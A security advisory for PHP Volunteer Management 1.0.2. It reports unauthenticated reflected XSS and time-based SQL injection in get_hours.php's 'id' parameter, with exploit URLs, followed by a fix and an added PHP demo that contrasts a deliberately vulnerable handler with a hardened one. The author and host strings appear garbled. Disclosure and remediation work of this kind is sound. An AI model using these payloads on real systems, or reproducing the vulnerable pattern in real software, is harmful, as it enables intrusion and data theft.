Title: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities
Author: G13 HdhCmsTest2cto测试数据
Download: https://sourceforge.net/projects/phpvolunteer/
Affected version: 1.0.2

0x01 Description
0x02 XSS
0x03 SQL Injection
0x04 Vendor Report

##### 0x01 Overview #####

PHP Volunteer Management is volunteer-management software that keeps track of volunteer hours worked and location assignments. The system is built on PHP/MySQL.

##### 0x02 XSS #####

---------------Flaw-------------------
The 'id' parameter on the get_hours.php page is vulnerable to XSS. No authentication is needed. This is a reflected XSS: the parameter is echoed back into the response without output encoding, so a crafted link executes script in the browser of whoever opens it.

----------Test-----------------------------------
http://HdhCmsTest2cto测试数据 /mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10

------------Exploit---------------------------
http://HdhCmsTest2cto测试数据 /mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10

The URL-encoded payload decodes to '"<script>alert(1);</script>; the leading quote characters break out of an attribute or string context before the script tag is injected.

##### 0x03 SQL Injection #####

---------------Flaw-------------------
The 'id' parameter on the get_hours.php page is also vulnerable to SQL injection. No authentication is needed.

----------Test-----------------------------------
http://localhost/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10

------------Exploit---------------------------
http://localhost/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10

The payload decodes to 1' AND SLEEP(5) AND 'BDzu'='BDzu, a time-based blind injection: a response delayed by about five seconds confirms that the value is concatenated into the SQL string and evaluated by MySQL.

Fix: filter and validate the input accordingly. Since 'id' is a numeric identifier, reject anything that is not an integer, pass it to the database as a bound parameter rather than by string concatenation, and HTML-encode it wherever it is reflected into the response.
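The following is an added example, not code from the PHP Volunteer Management project or from the advisory's author. It is a hypothetical reconstruction of the pattern that produces both defects reported above for get_hours.php (the 'id' parameter concatenated into the SQL text and echoed back unencoded) next to a hardened handler that validates, parameterises and encodes. The table name, column names, sample rows and the shape of the response are assumptions; SQLite in memory is used so the script runs stand-alone, while the real application is MySQL-backed and the same PDO pattern applies there.

```php
<?php
// Added example (hypothetical reconstruction), not the project's code.
// Models the two get_hours.php defects and a hardened equivalent.
// Table, columns, rows and response format are assumptions; SQLite stands
// in for MySQL so the script runs stand-alone.

function build_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE hours (id INTEGER, volunteer_id INTEGER, hours REAL)');
    // Constructed sample rows.
    $db->exec('INSERT INTO hours VALUES (1, 1, 2.5), (2, 1, 4.0), (3, 2, 1.0)');
    return $db;
}

// Vulnerable pattern: the untrusted id goes straight into the SQL text and into the HTML.
function get_hours_vulnerable(PDO $db, array $get): string {
    $id  = $get['id'] ?? '';
    $sql = "SELECT id, hours FROM hours WHERE volunteer_id = '$id'";   // SQL injection
    try {
        $rows = $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
        $body = json_encode($rows);
    } catch (PDOException $e) {
        $body = 'query failed: ' . $e->getMessage();
    }
    // The raw parameter is reflected into the response: reflected XSS.
    return "<h1>Hours for volunteer $id</h1>\n" . $body;
}

// Hardened handler: validate, parameterise, encode.
function get_hours_fixed(PDO $db, array $get): string {
    // 1. 'id' is a numeric key: anything that is not a positive integer is rejected.
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return 'invalid id';
    }
    // 2. Bound parameter: the value travels separately from the query text,
    //    so quotes, SLEEP() or a tautology inside it are never parsed as SQL.
    $stmt = $db->prepare('SELECT id, hours FROM hours WHERE volunteer_id = :vid');
    $stmt->execute([':vid' => $id]);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    // 3. Output encoding for anything reflected into HTML, even an already validated int.
    $safe = htmlspecialchars((string) $id, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h1>Hours for volunteer $safe</h1>\n" . json_encode($rows);
}

$db = build_db();

// The advisory's payloads, URL-decoded, plus a tautology variant that SQLite
// can actually evaluate (SQLite has no SLEEP()).
$xss       = ['id' => '\'"<script>alert(1);</script>'];
$sleep     = ['id' => "1' AND SLEEP(5) AND 'BDzu'='BDzu"];
$tautology = ['id' => "1' OR '1'='1"];
$benign    = ['id' => '1'];

echo "--- vulnerable ---\n";
echo get_hours_vulnerable($db, $xss), "\n";        // <script> tag lands in the page verbatim
echo get_hours_vulnerable($db, $tautology), "\n";  // every row comes back: the WHERE clause was rewritten
echo get_hours_vulnerable($db, $sleep), "\n";      // SQLite: "no such function: SLEEP" proves the text
                                                   // reached the SQL parser; MySQL would stall ~5 s instead
echo "--- fixed ---\n";
foreach ([$xss, $sleep, $tautology] as $bad) {
    echo get_hours_fixed($db, $bad), "\n";         // 'invalid id' for all three
}
echo get_hours_fixed($db, $benign), "\n";          // only volunteer 1's two rows, id encoded
```

Run it with `php get_hours_demo.php`. The order of the three defences matters less than having all of them: validation alone is fine while the parameter stays numeric, but the bound parameter is what keeps the query safe if the endpoint later accepts free-text filters, and the output encoding is what keeps a value safe once it is rendered rather than only stored.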